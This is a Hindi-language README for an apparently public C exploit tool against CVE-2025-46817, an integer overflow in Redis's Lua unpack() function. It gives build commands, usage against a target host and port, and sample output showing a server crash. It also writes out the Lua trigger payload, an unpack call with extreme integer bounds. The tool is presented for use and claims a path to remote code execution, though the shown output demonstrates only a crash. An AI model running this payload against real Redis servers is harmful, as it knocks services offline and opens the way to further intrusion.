
CVE-2025-46817 के लिए C-आधारित एक्सप्लॉइट, एक Redis पूर्णांक ओवरफ्लो भेद्यता, जो क्रैश डिटेक्शन और Lua unpack() पेलोड के माध्यम से संभावित RCE को सक्षम बनाता है।
Redis पूर्णांक अतिप्रवाह भेद्यता के लिए CVE-2025-46817 शोषण का एक हल्का C कार्यान्वयन।
sudo apt-get update
sudo apt-get install build-essential libhiredis-dev
sudo yum install gcc hiredis-devel
brew install hiredis
gcc -o exploit exploit.c -lhiredis
./exploit -H 127.0.0.1 -P 6379
./exploit -H 192.168.1.100 -P 6379 -t 5
-H <host> Redis सर्वर होस्ट (आवश्यक)
-P <port> Redis सर्वर पोर्ट (आवश्यक)
-t <timeout> कनेक्शन टाइमआउट सेकंड में (डिफ़ॉल्ट: 10)
-h सहायता संदेश दिखाएँ
██▓███ █ █░███▄ █ ▄▄▄▄ █ ██ █████▒ █████▒▓█████ ██▀███
▓██░ ██▒▓█░ █ ░█░██ ▀█ █ ▓█████▄ ██ ▓██▒▓██ ▒▓██ ▒ ▓█ ▀ ▓██ ▒ ██▒
▓██░ ██▓▒▒█░ █ ░█▓██ ▀█ ██▒▒██▒ ▄██▓██ ▒██░▒████ ░▒████ ░ ▒███ ▓██ ░▄█ ▒
▒██▄█▓▒ ▒░█░ █ ░█▓██▒ ▐▌██▒▒██░█▀ ▓▓█ ░██░░▓█▒ ░░▓█▒ ░ ▒▓█ ▄ ▒██▀▀█▄
▒██▒ ░ ░░░██▒██▓▒██░ ▓██░░▓█ ▀█▓▒▒█████▓ ░▒█░ ░▒█░ ░▒████▒░██▓ ▒██▒
▒▓▒░ ░ ░░ ▓░▒ ▒ ░ ▒░ ▒ ▒ ░▒▓███▀▒░▒▓▒ ▒ ▒ ▒ ░ ▒ ░ ░░ ▒░ ░░ ▒▓ ░▒▓░
░▒ ░ ▒ ░ ░ ░ ░░ ░ ▒░▒░▒ ░ ░░▒░ ░ ░ ░ ░ ░ ░ ░ ░▒ ░ ▒░
░░ ░ ░ ░ ░ ░ ░ ░ ░░░ ░ ░ ░ ░ ░ ░ ░ ░░ ░
░ ░ ░ ░ ░ ░ ░
░
CVE-2025-46817 शोषण उपकरण
पूर्णांक अतिप्रवाह -> RCE श्रृंखला
एक्सेस -> https://pwnbuffer.org/
लेखक: Slayerkkk
लक्ष्य: Redis <= 8.2.1
प्रकार: मेमोरी भ्रष्टाचार -> कोड निष्पादन
ℹ️ 127.0.0.1:6379 से कनेक्शन का परीक्षण...
✅ कनेक्शन सफल
ℹ️ Redis संस्करण: 8.2.1
❌ भेद्य - संस्करण <= 8.2.1
ℹ️ Lua स्क्रिप्टिंग का परीक्षण...
✅ Lua सक्षम (1+1=2)
🚀 शोषण शुरू करना
==================================================
💀 शोषण पेलोड निष्पादित करना...
पेलोड: unpack() के माध्यम से पूर्णांक अतिप्रवाह
💥 सर्वर क्रैश - कनेक्शन खो गया!
📊 शोषण परिणाम
==============================
💥 स्थिति: क्रैश (2.34s)
💀 शोषण सफल - सर्वर क्रैश!
CVE-2025-46817 भेद्यता की पुष्टि हुई
शोषण Redis के Lua unpack() फ़ंक्शन कार्यान्वयन (luaB_unpack) में पूर्णांक अतिप्रवाह को लक्षित करता है। जब विशिष्ट पैरामीटरों के साथ कॉल किया जाता है, तो हस्ताक्षरित पूर्णांक अंकगणित अतिप्रवाहित हो जाता है, जिससे Redis बड़ी संख्या में रिटर्न मानों को मटेरियलाइज़ करने का प्रयास करता है।
local data = {1, 2, 3}
return {unpack(data, -2147483648, 2147483647)}
उपकरण इनमें से एक स्थिति की रिपोर्ट करता है:
लेखक: Slayerkkk
वेबसाइट: https://pwnbuffer.org